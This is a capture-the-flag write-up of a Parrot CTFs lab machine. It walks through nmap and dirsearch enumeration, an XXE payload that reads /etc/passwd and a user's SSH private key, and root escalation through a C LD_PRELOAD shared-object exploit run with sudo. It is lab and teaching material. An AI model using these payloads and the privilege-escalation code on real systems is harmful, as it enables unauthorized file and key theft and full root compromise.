🦜 Parrot CTFs is an advanced cybersecurity education platform and Capture The Flag provider. Their goal is to create the most realistic Capture The Flag challenges and demonstrate real-world attack scenarios.

This is a medium difficulty machine that exploits a XXE vulnerability and a dynamic linker hijacking with LD_Preload to gain root privileges.

Content:

• Enumeration
• XXE
• Privilege escalation

Enumeration 🔎:

We start by using ping to check the TTL of the machine to determine the OS we are dealing with.

Based on the TTL value of 63, we can determine that the machine is running a Linux machine. However, this is not for sure, but it gives us an idea. For more information, you can view: Identify OS using TTL value.

Now, let’s go with an nmap scan to view the open ports.

sudo nmap -p- --open -sS --min-rate 5000 -n -v -Pn 10.14.0.12 -oN allPorts

-p- –> We are doing a scan against all 65535 ports to search for open ports.

--open –> It will only report open ports.

-sS –> It can be performed quickly, scanning thousands of ports per second.

--min-rate 5000 –> It sets the minimum rate of packets sent per second to 5000.

-n –> Tells Nmap to never do reverse DNS resolution on the active IP addresses it finds.

-v –> It will be verbose in its output.

-Pn –> This option skips the host discovery stage.

-oN –> It will save the output in a file called “allPorts”.

We find out the following open ports:

Let’s take a look at what the page has.

Let’s take a look at what the page has.

Well, we can’t see any of the posts because we get a 404 error, but we can see something interesting, a search button.

XXE 💉:

Let’s take a closer look at sending a request, intercepting it with Burp Suite, and sending the request to Repeater for further analysis.

I tried SQL injection payloads, but they didn’t work. So, I tried different combinations of other payloads and saw this interesting response.

Basically, our input is being placed as a XML structure, sooo maybe a XXE (XML External Entity) injection?? let’s check it out.

We can search for payloads in PayloadAllTheThings and I used the clasic XXE to retrieve files.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

IMPORTANT: You need to url encode the ampersand (&) cause if you don’t, it will not work. It should be %26.

It works, now searching for the word bash we can see two users jimmy and root.

Now we can search for configuration files, enumerate internal ports, and so on. But let’s focus on enumerating the web page more.

We can do fuzzing to the web page to search for directories with tools like: gobuster, wfuzz, ffuf, dirsearch… but I am going to use dirsearch in this case.

dirsearch -u http://10.14.0.12/

And we found the /management directory:

We found this note in: /management/admins/temp

We found this other note in: /management/employees/jimmy the same user that we saw earlier.

A id_rsa file in /home/jimmy/ssh/id_rsa.bak?? 😳, let’s try to search the file with the XXE vulnerability.

Well with this we can log to the system as the user jimmy with ssh, copy the id_rsa text of burpsuite, put it in a file and change the permissions of the file to 400 with chmod 400 id_rsa, and now connect with it:

ssh -i id_rsa jimmy@10.14.0.12

Now that we are inside the machine you need to do one thing to ensure smooth operation:

1. export TERM=xterm

This will allow us to clean the screen with ctrl + l.

Now we can see the flag 🎉.

Privilege escalation 🚩:

We need to enumerate the system to find a way to escalate privileges.

One thing I always check first is sudo -l. This command helps us determine if we have the ability to execute commands as other user. If we are lucky, we might discover that we can execute commands with the privileges of the root user.

More info about privilege escalation techniques check here.

We can see something interesting: env_keep+=LD_PRELOAD.

A quick search in Google tells us that we can escalate privileges with it.

We can go to /tmp directory and create a exploit like this:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}

Save the file as whatever.c and to compile it with:

gcc -fPIC -shared -o whatever.so whatever.c -nostartfiles

This will create a whatever.so file that we need it to execute:

sudo LD_PRELOAD=/tmp/whatever.so /usr/bin/ping

And now we are root :)

Hope you like it and learn something new :)